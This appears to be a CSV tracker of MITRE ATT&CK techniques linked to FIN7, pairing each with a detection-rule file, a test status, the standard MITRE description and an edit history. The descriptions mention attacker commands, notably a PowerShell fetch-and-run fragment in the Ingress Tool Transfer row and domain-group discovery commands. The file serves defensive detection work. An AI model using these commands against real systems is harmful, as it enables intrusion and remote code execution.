Technique ID,Name,Tactics,Status,Linked Rule,Liczba wykryć,Author,Description,MITRE Link,ChangeHistory
T1059.005,Visual Basic,Execution,Pending,alerts\FIN7\T1059.005_Visual_Basic.html,,APT Matrix Generator,"Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)  Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)  Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )",https://attack.mitre.org/techniques/T1059/005/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1059.007,JavaScript,Execution,Pending,alerts\FIN7\T1059.007_JavaScript.html,,APT Matrix Generator,"Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)  JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)  JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)  Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).",https://attack.mitre.org/techniques/T1059/007/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1069.002,Domain Groups,Discovery,Pending,alerts\FIN7\T1069.002_Domain_Groups.html,,APT Matrix Generator,"Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.  Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility,  <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.",https://attack.mitre.org/techniques/T1069/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1071.004,DNS,Command-And-Control,Pending,alerts\FIN7\T1071.004_DNS.html,,APT Matrix Generator,"Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.   The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling) ",https://attack.mitre.org/techniques/T1071/004/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1078,Valid Accounts,"Defense-Evasion, Initial-Access, Persistence, Privilege-Escalation",Pending,alerts\FIN7\T1078_Valid_Accounts.html,,APT Matrix Generator,"Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.  In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)  The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)",https://attack.mitre.org/techniques/T1078/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1078.003,Local Accounts,"Defense-Evasion, Initial-Access, Persistence, Privilege-Escalation",Tested,alerts\FIN7\T1078.003_Local_Accounts.html,,APT Matrix Generator,"Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.  Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ",https://attack.mitre.org/techniques/T1078/003/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1091,Replication Through Removable Media,"Initial-Access, Lateral-Movement",Pending,alerts\FIN7\T1091_Replication_Through_Removable_Media.html,,APT Matrix Generator,"Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.  Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware that is compatible with the connected system is on the mobile device, the malware could infect the machine (especially if Autorun features are enabled).",https://attack.mitre.org/techniques/T1091/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1102.002,Bidirectional Communication,Command-And-Control,Pending,alerts\FIN7\T1102.002_Bidirectional_Communication.html,,APT Matrix Generator,"Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet.   Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",https://attack.mitre.org/techniques/T1102/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1105,Ingress Tool Transfer,Command-And-Control,Pending,alerts\FIN7\T1105_Ingress_Tool_Transfer.html,,APT Matrix Generator,"Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).   On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)  Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)  Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)",https://attack.mitre.org/techniques/T1105/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1113,Screen Capture,Collection,Pending,alerts\FIN7\T1113_Screen_Capture.html,,APT Matrix Generator,"Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) ",https://attack.mitre.org/techniques/T1113/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1125,Video Capture,Collection,Pending,alerts\FIN7\T1125_Video_Capture.html,,APT Matrix Generator,"An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.  Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.  In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)",https://attack.mitre.org/techniques/T1125/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1190,Exploit Public-Facing Application,Initial-Access,Pending,alerts\FIN7\T1190_Exploit_Public-Facing_Application.html,,APT Matrix Generator,"Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.  Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) On ESXi infrastructure, adversaries may exploit exposed OpenSLP services; they may alternatively exploit exposed VMware vCenter servers.(Citation: Recorded Future ESXiArgs Ransomware 2023)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Depending on the flaw being exploited, this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).  If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.  Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)  For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)",https://attack.mitre.org/techniques/T1190/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1195.002,Compromise Software Supply Chain,Initial-Access,Pending,alerts\FIN7\T1195.002_Compromise_Software_Supply_Chain.html,,APT Matrix Generator,"Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.  Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)  ",https://attack.mitre.org/techniques/T1195/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1204.001,Malicious Link,Execution,Tested,alerts\FIN7\T1204.001_Malicious_Link.html,,APT Matrix Generator,An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).,https://attack.mitre.org/techniques/T1204/001/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
T1204.002,Malicious File,Execution,Pending,alerts\FIN7\T1204.002_Malicious_File.html,,APT Matrix Generator,"An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and .reg.  Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)   While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",https://attack.mitre.org/techniques/T1204/002/,"[{""user"": ""UpdateBot"", ""time"": ""2025-06-10 22:29""}, {""user"": ""UpdateBot"", ""time"": ""2025-06-10 20:22""}, {""user"": ""Krzysztof K."", ""time"": ""2025-06-10 19:32""}, {""user"": ""APT Matrix Generator"", ""time"": ""2025-06-10 19:32""}]"
